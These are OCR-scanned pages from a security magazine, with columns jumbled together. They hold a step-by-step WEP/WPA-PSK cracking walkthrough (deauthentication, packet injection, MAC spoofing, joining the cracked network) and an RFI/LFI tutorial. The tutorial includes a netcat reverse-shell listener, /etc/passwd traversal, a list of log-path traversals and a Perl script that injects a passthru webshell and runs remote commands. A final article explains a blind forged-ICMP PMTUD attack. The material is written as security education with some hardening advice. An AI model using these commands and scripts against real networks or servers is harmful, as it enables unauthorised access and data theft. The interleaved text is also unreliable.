better the word list, the more likely an ISO before, it is an image (or to go to Boot Menu) – you must se-
you are to crack long or complicated copy) of an entire CD in a single file, lect to boot from the CD drive. Once
WPA keys. and can be burnt onto CD. The trick this has been successfully done, a
with burning ISO's is not to burn the prompt will be displayed as boot:
How To Use BackTrack actual ISO itself to the disc as a data without the quotes. At this point, just
BackTrack is a Linux Live-CD dis- file, but rather the contents of that press enter and wait for everything
tribution which came into existence ISO. There are two ways of doing to load. When everything is finished
through the merging of the WHAX so. One is to extract the contents loading you will be prompted to
security auditing distro, and Audi- of the ISO with WinRAR, and then login. The username is root, and
tor – another Linux distro whose burn the extracted files to the root the password is toor. Once you have
main focus was security. Back- of the CD. The other is to get a pro- typed these in, type startx and press
Track is based upon SLAX, and gram like Nero or UltraISO and click enter. This will load the desktop, and
as such – it is highly customizable on the option to Burn ISO to Disc or you are ready to go. One problem
to the experienced user. For the Burn image to Disc. Most CD burn- that may be encountered on newer
less experienced though, it comes ing programs will have this option, computers with SATA drives is an
with literally hundreds of tools pre- as well as instructions on how to do inability to boot – in this case, copy
installed and ready to use, as well this, so I will not detail this step any the BT folder off of the CD to the C
as pre-patched drivers so things further. Once the image has been Drive of the main computer. This
like wireless cracking will work with burned to the disc, you will need to should solve that problem. Any other
most cards straight away (as long boot of this CD. In order to do this, issues can be sorted out by visiting
as the cards support raw packet one of two things must be done. You http://forums.remote-exploit.org/
injection). BackTrack's main focus is must either go into your computers
also security auditing, and has been BIOS settings (usually it will tell you Choosing
ranked as the #1 Linux Distribution what key to press in order to do this the Right Wi-Fi Card
by Insecure.org (the home of Nmap (most common are [Delete], [F8 ], As you would be aware, a lot of
– a popular port scanning tool). Us- or [F10 ]) – and this must be done Wireless cards are out there on
ing BackTrack is a basic procedure as the computer is still booting up the market, but only those which
support Raw Packet Injection and
Monitor Mode can be to used for
wireless cracking. All cards need to
be patched with the MadWifi card
drivers (how to tell if your card is com-
patible – http://www.aircrack-ng.org/
doku.php?id=compatible_cards). A
list of compatible cards is available at
http://www.aircrack-ng.org/doku.php
?id=compatibility _drivers&s=patchin
g%20drivers, and the MadWifi drivers
are available at http://madwifi.org/
wiki/UserDocs/GettingMadwifi, with
patching instructions available at
http://madwifi.org/wiki/UserDocs /
FirstTimeHowTo. However, Back-
Track comes with all cards already
patched so that you only have to wor-
ry about compatibility (which is much
better for work on the fly), and this is
Figure 4. Airodump displaying all local networks why I prefer to use BackTrack.
• MAC address of the pc running (this should remove the files off the
aircrack-ng, which is in this case, desktop, but this can be done manu-
00:13:46:74:03:F5 ally using the delete button).
www.hakin9.org/en
Attack
Once this is done, you should also demonstrate a second alterna- interface (local – 127.0.0.1), an eth0
have the latest version of Aircrack- tive method to use if you have no which is your ethernet connnection,
ng installed. This is what we will be clients attatched to the network. and in this case wifi0 and ath0, the
using, but first a little bit of theory We will then use a program (also wireless connections (on the ath0
about what we are going to do. The part of the suite) called aireplay- connection, it will say Access point:
first type of security we are going ng to trick the AP into thinking we FF:FF:FF:FF:FF:FF – this is not actu-
to crack is a WEP-Encrypted Net- are part of the network (called fake ally the MAC address of the AP, it
work, the weaker of the two main authentication) and also use it to is instead your local MAC address,
types of encryption. Our situation inject packets into the network, in so take note of what it says – see
is a home network with a computer something called ARP request-re- Figure 3).
already attatched to the network play mode (which generates more Once this is done, and in the
(also known as a client). If a client traffic, which means more packets same window, we will need to pro-
is attatched, you will often have to and more IV's – they are what we ceed to stop the wireless interface
just start the network traffic dumper want). The final step (and the most (ath0) so that we can start it with the
(airodump-ng) and sit back until it simple) is the actual cracking of the special drivers and monitor mode
has collected enough IV's. How- key (using Aircrack-ng). Everything needed. We do this by typing:
ever, this is not always the case, that is explained here is the same
and so we will also trick the access process that was used in the video bt ~ # airmon-ng stop ath0
point into thinking we are already included on the disc that came with bt ~ # airmon-ng start wifi0
part of the network, and then this magazine. I will now explain
bounce traffic off of it to capture how we do all this, step by step. We have just stopped the ath0 in-
more packets (remembering that All the MAC addresses and other terface, and then started it with the
the more packets we capture, the variables used are listed above, so special MadWifi drivers (by starting
higher chance of getting the WEP where you see them, just substitute wifi0 instead of ath0 – this is impor-
key we have). To do this, we have to them for your equivalents. tant to do). At the moment, we have
set the wireless card into a special Once you have booted from started it monitoring on every chan-
monitor mode on the specific chan- BackTrack (or whatever distro you nel, because at this stage we do not
nel of the wireless network that we are using), and are on the desktop, know what networks are around us.
are trying to crack. This allows us open up a terminal session (the com- To find out what networks there are,
to intercept all data that is travelling mand line prompt for linux). Enter in we need to open a new console and
through the air on that channel (and the command: start airodump-ng. We do this by typ-
having it monitor just one channel ing the following:
speeds up the capture process im- bt ~ # iwconfig
mensely). We then use a program bt ~ # airodump-ng -w test ath0
called Airodump-ng (part of the This will show us all the available
previously installed Aircrack-ng network connections on the laptop The -w test option tells it to write the
suite) to capture all this traffic to or PC being used. Generally, it will capture to a file named test via the
a file, which we will use later. I will include lo which is the loopback interface ath0. We should now see
a window similar to Figure 4, which
will display all available networks
in the surrounding area (that traffic
passes through from).
You will see a number of differ-
ent columns in this window. The
BSSID column contains the MAC
address of any available AP's.
The PWR column is an indication
of the power of the signal that
you are receiving. The stronger it
is, the better for faster traffic etc.
The Beacons is an indication of
the amount of traffic travelling by.
The #Data is what we need to pay
attention to – this is the amount of
IV's you have captured. The #/s is
also important, as this indicates
Figure 6. PRGA Packet Found how many IV's per second you are
capturing. CH is the channel the This starts wifi0 monitoring on chan- by the -e option). The -a 00:11:50:
network is on. MB is the speed of nel 1. Re-enter iwconfig command 51:FD:DC is the AP's MAC address,
the network (in MB/s). ENC, CI- just to check everything looks ok, -h 00:13:46:74:03:F5 is our local MAC
PHER, and AUTH are all encryp- and then head over to the previous address, and ath0 is obviously the
tion method related, and ESSID is airodump-ng console session, and interface. We are basically providing
the nickname of that network. Out enter in: the program with all the information it
of this window, note down (proba- needs to do its fake Authentication.
bly on a piece of paper or separate bt ~ # airodump-ng -c 1 -w output ath0 A successful authentication should
text file) the BSSID of the AP you say Authentication Successful (yes
wish to gain access to and remem- This will start ath0 monitoring on – that includes the smiley face). Now
ber what channel it is on. You can channel 1 and dumping to the file we can go one of two ways: client at-
now stop airodump-ng by pressing output.cap. Leave this running for tached or client not attached. They
the [Ctrl ]+[C ] combination (this now. You may or may not see any are as follows:
will stop any current terminal op- activity. We now need to do a fake
eration). In the bottom half of the authentication with this AP (trick it The following section
window, you will notice a few differ- into thinking we are part of the net- is what to do when
ent, but somewhat similar columns. work already, so that it will send us you have a client attatched:
The Station is the MAC address of traffic). This is done by typing: If you have no clients attached, or this
any client in the network, and the method does not work for you, skip
BSSID is the MAC of the access bt ~ # aireplay-ng -1 0 -e DOVER -a to the next section. We now need
point it is connected to. The PWR is 00:11:50:51:FD:DC -h 00: to set aireplay-ng to generate some
the signal strength between the cli- 13:46:74:03:F5 ath0 ARP requests for us. Aireplay-ng will
ent, and your computer. Packets is listen for ARP packets on the net-
the amount of packets that the cli- Where -1 0 tells it to do a Fake Au- work, which it will then capture, and
ent has sent to the AP, and probes thentication with a re association re-inject into the network, and the AP
is the ESSID of the network that it timing of 0 seconds (but this can be will re-broadcast them, causing many
is connected to. Now that we know configured to personal taste). If you more IV's to be generated. By doing
what channel the network is on, we are feeling experimental, instead of this step, we should see the #/s rate
need to head back over to our origi- -1, you can use -0, which will tell it in airodump-ng increase quite drasti-
nal console session that we did all to disassociate all attatched clients, cally. Enter:
of our iwconfig and airmon-ng com- forcing them to reconnect and send
mands on. Once there, type: data, which will generate IV's. You bt ~ # aireplay-ng -3 -b 00:11:50:51:
will have to change the timing in- FD:DC -h 00:13:46:74:03:F5 ath0
bt ~ # airmon-ng stop ath0 terval to suit though. DOVER is the
bt ~ # airmon-ng start wifi0 1 ESSID of the AP (which is defined Where -b 00:11:50:51:FD:DC is the ac-
cess point's MAC address, and -h 00:
13:46:74:03:F5 is once again our local
MAC address of our PC. Ath0 is still
the interface. Shortly after this is en-
tered, you should see the number of
ARP requests increasing, and the #/s
of the airodump-ng window anywhere
between 150 and 300, as well as
#Data increasing faster. Now skip past
what to do when you have no clients,
and proceed to Cracking the Key.
such a case, you will need to use the same as the Fragmentation the same name. Keep this console
aireplay-ng to capture a PRGA attack, but is used when frag- open. The next step is the injection
(pseudo-random generation algo- mentation does not work. To start process. In the same console ses-
rithm) to create more packets for a fragmentation attack, open a sion, type:
injection, which will allow us to gain new console and type:
more IV's. There are two ways of bt ~ # aireplay-ng -2 -r
doing this. I will explain the Frag- bt ~ # aireplay-ng -4 -h 00:13:46:74: replay_src-1013-152347.cap ath0
mentation attack. If this does not 03:F5 -b 00:11:50:51:FD:DC ath0
work, use the next section – the where -2 tells aireplay-ng to use
Chopchop Attack. To start this, Where -4 indicates to do a Chop- interactive frame selection, and -r is
enter (in a new console session): chop attack using the given informa- just the filename of the ARP packet.
tion. The system will again display You should now start to see the IV's
bt ~ # aireplay-ng -5 -b 00:11:50:51: the captured packet, and ask you in airodump-ng increasing fairly fast,
FD:DC -h 00:13:46:74:03:F5 ath0 if you would like to use this one. and the #/s at quite a reasonable
Press y for yes, and take note of the speed.
Where -5 is telling it to do a Frag- .xor and cap files it created and dis-
mentation attack, using the rest of played the name of in the success How to crack the WEP
the data. Aireplay-ng will now read message. Now proceed onto Creat- key (applicable to both
all packets before it finds a suitable ing the ARP Packet. clients and no-clients
one, at which point, it will display the situations):
contents of it on the screen, and ask • Creating the ARP Packet – In Now all there is left to do is wait un-
you if you want to use this packet. one of the previous two steps, til enough IV's have been captured,
Answer y for yes. This is the PRGA you would have captured an and then run aircrack-ng to get the
packet we use for ARP packet crea- xor and a cap file. These are password. Aircrack-ng can also be
tion and injection. the files we are going to use to run whilst the capture is still hap-
After this, a success message will create our ARP packet for injec- pening. It will display the password
be displayed on the screen, and near tion. To do this, type in a new when it finds it and it will continu-
the bottom of that screen, it will say: console session: ously update the IV list as they are
Saving keystream in fragment-1013- captured. To do this, we enter (in a
153351.xor, where the fragment- bt ~ # packetforge-ng -0 -a 00:11: new console session):
xxxx-xxxxxx.xor is a unique filename 50:51:FD:DC -h 00:13:46:74:03:F5 -k
to your system. Nearer to the top of 255.255.255.255 -l 255.255.255.255 bt ~ # aircrack-ng -z output*.cap
that message, it will also say Saving -y fragment-1013-153351.xor -w
chosen packet in replay _src-1013- replay_src-1013-152347.cap The -z option tells it to use the
152347.cap, where the filename is faster PTW method, which is pos-
also unique to your PC. Take note of where -0 tells packetforge-ng to sible because we used ARP pack-
these file names – i.e. do not close generate an ARP packet, with the ets. If we did not use ARP packets,
this console session. If this attack information given. Leave the IP ad- we would have to leave out the -z
did not work, use the next section dresses as 255.255.255.255, as these option, and capture many more
– Chopchop attack. If it did work, will work for most AP's. We do not packets. Output*.cap tells Aircrack-
skip the Chopchop attack and go to need an interface at this stage, as ng to use every capture file start-
Creating the ARP Packet. we were only creating the packet, ing in output, and ending in .cap.
not injecting it yet. It should say Aircrack-ng will then display a
• Chopchop Attack – The Chop- Wrote packet to replay _src-1013- list of all networks that had traffic
chop attack is used to do exactly 152347.cap, where the cap file is of captured. Choose the one that you
were trying to crack (in this case
DOVER – we do this by pressing 1,
because it is the first in the list). It
will then proceed to crack the key,
and eventually display it on the
screen. In this case, the password
was --:1F:98:11:98:6F:--:15:B8:39:
7E:56:-- (the – are blanked out for
privacy reasons).
To use this key in BackTrack in
order to access the internet, enter
Figure 8. Airodump-ng window with WPA the following commands in a new
console session (you can close all word on each line. The program personally have a complete word-
the others): that uses this takes the word on lists from every different language,
each line and tests this against as well as names of people, celeb-
bt ~ # wlanconfig ath0 destroy the password to see if they match. rities, places, TV shows, common
bt ~ # macchanger --mac 00:17:AB:4B:53: If they match, you have found the passwords, odd words, Star Trek,
C7 wifi0 password, if not, it moves on to the movies, and many other things. If
next one. Some programs offer you would like some links for down-
(this is optional, use it to fake your- features such as smart mutations, loads, refer to the list at the end of
self as a different computer by using where your wordlist may contain for the article, in the On the ‘Net sec-
some other MAC address) example: tion. There are two methods of gain-
ing the WPA four-way handshake
bt ~ # wlanconfig ath0 • dog that we need. One is Passively, i.e.
• cat you sit and wait for another client to
Create wlandev wifi0 wlanmode • person connect to the network, and then
managed. The system responds by airodump-ng will capture that hand-
displaying the following: But with smart mutations, these will shake. The other method is Actively,
be tested not only as written, but also where you use aireplay-ng to de-au-
ath0 with things like: Dog, Cat, Person, thenticate an existing (currently con-
bt ~ # ifconfig ath0 up DOG, CAT, PERSON, C@T, C@t, nected) client. This will force them to
bt ~ # iwconfig ath0 essid DOVER key P3RSON, P3rson, P3RS0N, P3rs0n, reconnect to the network, at which
--:1F:98:11:98:6F: etc. point the handshake will occur and
--:15:B8:39:7E:56:-- That is basically what smart you will capture this. The procedure
bt ~ # dhcpcd ath0 mutations do, but they will obviously for cracking a WPA network is to
take a lot longer to go through your start our wireless card in the moni-
In this example, I used a 128-bit key wordlist, as it is (at bare minimum) tor mode required and the correct
for encryption, however, I would ad- doubling the total length of the list. channel for the network. Then we
vise you use a 64-bit key for learning Now, seeing as wordlists are re- will set airodump-ng capturing so
purposes to start off with. quired for WPA cracking, it is a good that any handshakes that occur will
idea to have one (or more than one). be recorded. Next, we will de-au-
How To Do A Basic You can create your own if you wish, thenticate the connected client and
WPA-PSK Crack but this is time consuming and only use Aircrack-ng to crack the key. To
with Aircrack really worth it if you already have a start this, we will need to set up the
Now, I will tell you how to crack the fairly good idea of what you think the card into monitor mode and then
second type of wireless network person would have their password determine which channel the WPA
encryption – the WPA encrypted as. Instead, you can download them network is on. Although you should
networks. As mentioned earlier, from many locations on the web. I know how to do this from the WEP
the only way to crack a WPA en-
crypted connection is to capture a
4-way handshake between a Cli-
ent and the AP, and then to use a
dictio-nary attack on the password
in this handshake, plus (as written
earlier), aircrack-ng can only crack
the PSK (pre-shared keys), so if
the WPA encryption is no PSK,
then you will not be able to crack
it. You will manage to tell this by
looking in the airodump-ng capture
screen under the AUTH column (for
Authentication Method). It should
say PSK. Considering that WPA
needs to be cracked via a diction-
ary attack, I will explain what that is
for those of you who do not know. A
dictionary or word-list is basically a
text file (or sometimes just plainly,
a file with no extension) with one Figure 9. Aircrack-ng successfully cracked WPA key
Gordon Johnson
Difficulty
I have always found RFI and LFI to be one of the most interesting
concepts in terms of web exploitation. Although it may normally
be interpreted as the most common, script kiddie-esque form of
exploitation, I find this to be false. When the term script kiddie
is used, most people generally think along the lines of point and
click exploitation.
I
n RFI and LFI there are more levels and written. RFI exploits the include command
dynamics than what meets the eye. Bear to run your script, remotely within the given site.
in mind, I hold absolutely no responsibil- If we can manipulate the $base _ path variable
ity whatsoever for someone's so-called moral to equal our own script/public directory, then
actions or lack thereof. And of course, the old it will run as if it was a normal file on the web
perform at your own risk also comes to mind; server itself.
revel in the hackneyed glory. Given a website that uses the very basic
include command given above, making it vulner-
RFI able to this exploit, and knowing what the given
Let us proceed to business. RFI stands for Re- variable is by viewing the code in index.php (http:
mote File Inclusion. The main idea behind it is //lameserver-example.com/index.php) we can
that the given code inserts any given address,
albeit local or public, into the supplied include
command. The way it works is that when a web- What you will learn...
site is written in PHP, there is sometimes a bit
• What Remote and Local File Inclusion are
of inclusion text that directs the given page to
• What makes them tick, how to execute them
another page, file or what you have. Below is an
• How to defend against them by taking proper
example of the code: PHP coding methods
include($base_path . "/page1.php");
What you should know...
The include statement above uses the page1. • General understanding of perl and PHP
php as its file to load. For example, if the user • Basic idea of how an operating system func-
was to browse to the bottom of the page and tions
click Next, he will execute the code that trig- • Large vernacular in terms of commonly used
gers the next page to load. In this case, it could UNIX commands, and a large heaping of logic.
be page2.php depending on how the code is
elsewhere. Before I go any further, of the tutorial. This will enable us to time, you may execute commands,
go grab the tor, Vidalia, Privoxy, and harness the back-connect script, and and attempt to gain root by using
TorButton bundle, and install it. Prox- connect to it directory, thus giving us various methods. I suggest you type id
ies are your friend, remember that. full access to the server. After getting first, find out a bit of information about
But yet again, I only condone this if nc.exe, the command to be executed what server you are dealing with. From
you own the server, or have exclu- is nc -l -n -v -p 8080 that point, after finding out what kernel
sively been given the right to do so Let us quickly go through what it is, finding exploits for that given ker-
(see Figures 1, 2, 3). each command represents after “nc” nel would be necessary to gain root.
Now of course I did not touch this so it is understood what is occurring However, this is another topic for later.
site of mine at all, and I hid the URL, on your machine: -l, -v, -p = listen Let us try not to stray too far away from
etc. for very good reason. The pic- to all incoming connections on the RFI and LFI.
tures are pretty much self-explana- specified port (whatever comes after As you can see, you can dramati-
tory of what you are capable of doing -p). -n specifies that it must be a nu- cally expound upon each method.
on here. meric address only, no DNS (mean-
Lovely! Now when we have an ing IP address only). LFI
access, we can gain a shell back to Proceed back to the RFI exploited LFI is a Local File Inclusion. This is
the server itself with a back connect web page and look for the area where when you find a particular file within
method. Here is what makes RFI it states: Local command. Within the a database and uses it against the
rather interesting: the ability to exploit supplied text field, you would need web server. Such as discovering
it even further. All that needs to be to type the following command: perl the faithful /etc/passwd/ username/
done at this point would be to find back.pl <your _ public _ ip _ address _ password file, cracking the MD5
a directory that enables you to upload here> 8080. This will allow the perl bina- hash, (the format for encryption is
any file you choose. In this case, we ry to execute the code you had recently {CRYPT}$1$salt$encrypted _ pass) and
will upload a Perl script to a RW direc- uploaded. The script will run, and give then logging in via ssh. The method
tory. Though I will not provide a back- you access to the server remotely. If is pretty much same as above, just
connect script, you should have no you glance back at your netcat com- a matter of finding the exploitable
problem finding it, installing Perl, mand that was executed earlier, you site. All same ideas here, except we
etc. From this point, the well-known will notice that you have connected are now applying a different address
netcat program becomes a large part to the targeted server. At this point in within the inclusion, the file located
by default on the server. One exam-
Listing 1. Default Log Locations ple on how to find these particular
sites would be to look either for an
../apache/logs/error.log exploit on milw0rm, or do a Google
../apache/logs/access.log
search for:
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log inurl:home.php?pg=
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log or
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
inurl:index.php?pg=
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log They are pretty easy to find, it took
../../../../../../../usr/local/apache/logs/access_log me roughly 40 seconds to find it (see
../../../../../../../usr/local/apache/logs/access.log
Figure 4).
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
All I had to do was to add: ../
../../../../../../../var/log/apache/access.log ../../../../../../../../../../../../
../../../../../../../var/log/apache2/access.log etc/passwd after the code stating:
../../../../../../../var/log/access_log home.php?pg=
../../../../../../../var/log/access.log
How much easier could it get?
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
Now that we have all of this informa-
../../../../../../../usr/local/apache/logs/error_log tion in front of us, let us interpret what
../../../../../../../usr/local/apache/logs/error.log it means, and how we may use it to
../../../../../../../var/log/apache/error_log our advantage. The syntax of the text
../../../../../../../var/log/apache2/error_log
in front of you is username:passwd:
../../../../../../../var/log/apache2/error.log
UID:GID:full _ name:directory:shell
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log However, it appears in our case
that the password is hidden aka
shadowed. This means that it has and we will make reference to the use Header Spy to help us figure out
been replaced with an x, and is now lengthy list: Listing 1. what might the default directory for
located within /etc/shadow. We will Normally, just as before, you would logs may be. For example, you may
not be able to access this, since it apply each directory string after the = notice that it is using Apache 2.0.40
may only be accessed by root. No and see where it takes you. If success- with a Red Hat OS. Simply do a bit of
problem, this is just to get our feet ful, you should see a page that displays Googling to find out what the default
wet. Whenever you see an x as op- some sort of log for the moment it is directory for logs is, and low and be-
posed to a garbled password, it is executed. If it fails, you will be redirect- hold, in this case it is /../../../../../../
located in the /etc/shadow, and if ed to either a Page cannot be found, etc/httpd/logs/acces _ log. Now when
you see a !, it means that it is located or redirected to the main page. To we have the proper directory, we may
within /etc/security/passwd. On the make this process slightly less painful/ exploit it (inject code). With this log file
other hand, let us just say you found daunting, it is very useful to have a in hand, we can now attempt to inject a
a good file without anything being plug-in for Firefox entitled: Header command within the browser, such as
shadowed. All you need to do now Spy. It will tell you everything you need <? passthru(\$ _ GET[cmd]) ?> (please,
is decrypt it. You may also wish to to know about the web server, such as keep in mind that this is merely an
peruse around in other directories, the Operating System it is running, and example of what the vulnerable code
such as: what version of Apache the server is we are exploiting may be, and would
running. If you were to stumble upon a need to be changed accordingly).
/etc/passwd vulnerable box that does not properly This may be injected at the end of the
/etc/shadow pass through text, and displays a list address, but will most likely not work
/etc/group of shadowed passwords, we can now since your web browser interprets
/etc/security/group
/etc/security/passwd Listing 2. Log Injection Script
/etc/security/user #!/usr/bin/perl -w
/etc/security/environ use IO::Socket;
/etc/security/limits use LWP::UserAgent;
$site="www.vulnerablesite.com";
/usr/lib/security/mkuser.default
$path="/";
$code="<? passthru(\$_GET[cmd]) ?>";
Every now and again, though, the $log = "../../../../../../../etc/httpd/logs/error_log";
website may output that /etc/passwd/
cannot be found simply because the print "Trying to inject the code";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site",
server is interpreting the location as if
PeerPort=>"80") or die "\nConnection Failed.\n\n";
it is /etc/passwd.php/. To correct this, print $socket "GET ".$path.$code." HTTP/1.1\r\n";
we need to apply what is called a Null print $socket "User-Agent: ".$code."\r\n";
Byte. This bit of code looks like: %00. print $socket "Host: ".$site."\r\n";
In SQL, it means 0, but everywhere print $socket "Connection: close\r\n\r\n";
close($socket);
else in coding, it is interpreted similar
print "\nCode $code successfully injected in $log \n";
to a black hole, such as /dev/null/.
This code eliminates the use of an print "\nType command to run or exit to end: ";
extension. The code would appear $cmd = <STDIN>;
as /etc/passwd%00 when entered into
while($cmd !~ "exit") {
the address bar.
But there is no reason to be $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site",
discouraged when seeing a shad- PeerPort=>"80") or die "\nConnection Failed.\n\n";
owed list of passwords; you should print $socket "GET ".$path."index.php?filename=".$log."&cmd=$cmd HTTP/
be thrilled to have even discovered 1.1\r\n";
print $socket "Host: ".$site."\r\n";
a vulnerability. At this point in time,
print $socket "Accept: */*\r\n";
we know two things: one – that noth- print $socket "Connection: close\r\n\n";
ing is properly passed through with-
out being sanitized by PHP, and two while ($show = <$socket>)
– we now know that we have the abil- {
print $show;
ity to look for logs to inject. Normally,
}
LFI tutorials stop a few lines above
here, but we shall go a bit more in print "Type command to run or exit to end: ";
depth. There are many common de- $cmd = <STDIN>;
fault directories/*.log locations for }
PHP Hardening
Both methods are very useful when
testing your PHP and Perl skills,
and also very powerful when placed
into the wrong hands. That is why
Figure 3. RFI it is always good to practice proper
sanitation when coding, and to never
take any shortcuts simply because
it's there.
Conceivably the most important
part of the article is to give a few hints
about how to avoid such dilemmas.
Simply put, the include command is
not bad nor evil, but mistreated by
people who do not know what they
are doing, and commonly use it as
a form of laziness when coding. An
alternative to properly sanitizing
your code would be to disable a few
Figure 4. LFI example options within your PHP.ini. Choose
Difficulty
T
he main function of the IP protocol in network, and as a consequence, neither of the
the Internet Architecture is to mask the involved systems will transmit packets that are
differences that may exist between dif- larger than the MTU of the network that con-
ferent network technologies, so that they can nects them. However, when two systems are
inter-operate. In order to meet this goal, the IP connected to each other through one or more
protocol imposes almost no requirements on routers, these systems will have no knowledge
the underlying network technologies, and pro- of the characteristics of the intervening net-
vides its users with a basic data transfer serv- works, including their MTUs.
ice, that serves as a building block for creating
more advanced data transfer services.
One of the most popular and dominant net- What you will learn...
work technologies of the last decades is called
packet switching, and consists of the transfer • How the Path-MTU Discovery mechanism
works
of small chunks of data that are referred to as
• How to perform a blind performance-degrading
packets. There are a wide variety of param-
attack against a TCP connection
eters that characterize each packet-switching
• Which counter-measures can be deployed to
network technology. One of these parameters defend a network against this attack
is the maximum packet size that can be trans-
ferred with that network technology. This
What you should know...
parameter is usually referred to as MTU (Maxi-
mum Transmission Unit). • Principles of operation of the TCP and IP proto-
When two or more systems are directly con- cols
nected to each other with some packet-switch- • Basic knowledge of computer networks
ing network technology, each of the systems • Basic knowledge of cryptographic signatures
will have full knowledge of the characteristics • Basic knowledge of TCP/IP security mecha-
of the network technology being employed. nisms
Among these characteristics is the MTU of the
The difference between the MTU The Path-MTU menting PMTUD will transmit its IP
of the different network technologies Discovery Mechanism packets with the DF (Don’t Frag-
involved in an internet presents a While the IP fragmentation mecha- ment) bit set. This bit signals the
challenge to the internet protocol nism has been successfully employ- intervening routers that the source
suite, which must solved to avoid ing for a long time, as experience host does not want its packets to be
interoperability problems. For exam- with the IP protocol was gained, a fragmented. If any of the intervening
ple, if we connect a network employ- number of researchers found that routers finds that one of the packets
ing Ethernet technology with another it had a number of negative effects is too big to be forwarded without
network that employs Token-Ring which called for the engineering being fragmented, the router will
technology, we would get a sce- of an alternative mechanism that drop the offending packet and will
nario such as that shown in Figure could replace IP fragmentation. signal the error condition to the
5, in which an IP router interconnects This has led the IETF (Internet En- source host by means of an ICMP
these two networks. gineering Task Force) to evaluate a fragmentation needed and DF bit
It is evident that in this scenario, number of alternative mechanisms set error message. Figure 6 illus-
Host A Hill have no knowledge of that would enable the interoper- trates such a scenario.
the characteristics of the network ability of heterogeneous networks, Figure 3 illustrates the syntax
to which Host B is connected, and without the need of relying on the of the ICMP fragmentation needed
vice-versa. Consider the case when IP fragmentation mechanism. and DF bit set error messages.
Host B (which belongs to the Token The mechanism that was finally Among other fields, the ICMP
Ring network) tries to send a 17914- engineered and adopted by the error message contains a Next-
bytes packet to Host A. When IETF was called Path-MTU Discov- Hop MTU field, which is used by
Router C receives this packet, it will ery, as it aims to discover the maxi- the router that detected the error
find out that the packet is too big to mum packet size that could be sent condition to inform the source
be forwarded through the Ethernet from the source host to the destina- host the MTU of the network that
network (which has an MTU of 1500 tion host without fragmentation. prevented the packet from being
bytes). The Path-MTU Discovery mech- forwarded without fragmentation.
anism is specified by RFC 1191 (for This information will be used by
IP Fragmentation IPv4) and by RFC1981 (for IPv6). It the source host to reduce the size
With the goal of solving the chal- operates as follows. Hosts imple- of its packets accordingly, to avoid
lenge presented by the scenario
described above, the Internet Pro-
tocol (IP) implements a mechanism
called fragmentation that can be
used to fragment a packet into
smaller pieces, so that the size of ��� �������������� ������
������
each of these fragments is smaller
than the MTU of the network that ���������������������� �����������������������
raised the problem. Each of these ������������ �����������
them from being discarded by the The IETF specifications state thus the host receiving the ICMP
network. Furthermore, each ICMP that the full IP header plus the first error message will be able to match
error message will contain a piece 8 bytes of the IP payload must be the error to the TCP connection that
of the packet that elicited the er- included in the payload of the ICMP elicited it. Figure 8 illustrates the
ror, on the premise that piece will error message. Therefore, in case structure of an ICMP error message
contain all the information that is such an error is elicited by a TCP that has been elicited by a TCP seg-
necessary to demultiplex the error segment, the four-tuple (Source ment. Figure 7 and Figure 9 illustrate
message to the communication in- Address, Source Port, Destination the syntax of IP packets and TCP
stance (e.g. TCP connection) that Address, Destination Port) will be segments, respectively.
elicited it. available in the ICMP payload, and Thus, the host receiving the
ICMP error message will hand
the message to the corresponding
communication instance. In case
�������������� the communication instance that
elicited the error is a TCP connec-
tion, TCP will reduce the size of the
segments it sends, according to the
Next-Hop MTU field of the error
message, and will retransmit the
dropped data. This iterative process
will be repeated as many times as
needed, until the source host reduc-
es the size of the packets it sends so
that they are small enough that they
don’t need to be fragmented, but as
�������� large as possible so that overhead
is reduced.
Finally, the specifications recom-
mend that every ten minutes TCP
should try sending large packets
again (probably repeating the proc-
ess described above), so that in the
event the MTU of the path between
the source host and the destination
host increases (for example as a re-
sult of a route change), the TCP con-
nection can benefit from it.
Attack Against
��������
the Path-MTU
Discovery Mechanism
Unfortunately, the IETF specifica-
tions do not recommend any type
of validation check for the ICMP
Figure 2. Scenario of a “blind” attack error messages. This means that,
as long as the payload of the ICMP
� ������� �������� ��
error messages contain a valid four-
tuple (Source Address, Source Port,
�������� �������� ��������
Destination Address, Destination
������������������ ������������ Port), the error messages will be
considered legitimate. This situation
������������������������������������������������������������������������� can be exploited by an attacker who
could send forged ICMP fragmen-
tation needed and DF bit set error
messages to reduce the size of the
Figure 3. Syntax of ICMP "fragmentation needed and DF bit set" error packets that are sent to the attacked
messages TCP connection.
This vulnerability does not re- can be as small as 68 bytes. There- First, if we assume that the at-
quire the attacker to have access to fore, the attacker could potentially tacker knows which two systems
the packets that correspond to the reduce the size of the packets that have established the TCP con-
attacked connection. Regarding this, are sent for a TCP connection to nection to be attacked, we can
the attacker could be completely off such a small value. assume that both IP addresses
the path that the packets travel and In order to successfully perform (that is, the Source Address and
that corresponds to the connection, the attack, the attacker would need the Destination Address) will be
and nevertheless exploit this vulner- to know or guess the four-tuple known, or that there will be only
ability. When exploited in such a way, (Source Address, Source Port, a few possible values (in case one
it is said that the attacker is perform- Destination Address, Destination of the systems has more than one
ing a blind attack. Figure 2 shows Port) that needs to be included in IP address). Secondly, the TCP
a possible scenario for a blind attack the payload of the forged ICMP port number used by the host act-
against the Path-MUT Discovery error messages (so that they are ing as the server will be the well-
mechanism. matched to the target connection). known port that corresponds to the
The attacker will send forged While the reader might think that service that is running on top of
ICMP error messages to the sending would be very unlikely that the at- the TCP connection. With all these
side of the TCP connection that will tacker could guess the four values considerations, the only value that
contain a very small Next-Hop MTU that identify the TCP connection to the attacker would need to actu-
value, so that the attacked host re- be attacked, a bit of analysis will ally guess is the TCP port number
duces the size of the packets it sends show that in practice it is much used by the client (the so-called
to that value. According to the IPv4 easier to guess these values than ephemeral port). Considering the
specification, the MTU of a network one would expect. fact that TCP port numbers are 16-
bit values, there will be only 65536
possible values for the client port.
Therefore, an attacker could simply
���
������
���������� send 65536 ICMP error messages,
each of them with a different client
port number, thus trying all the pos-
sible combinations.
In practice, however, the number
of possible combinations is much
���
����������
���
���������� smaller, as all TCP implementa-
������ ������
tions pick ephemeral port numbers
from a small range of the whole port
number space (e.g. the port range
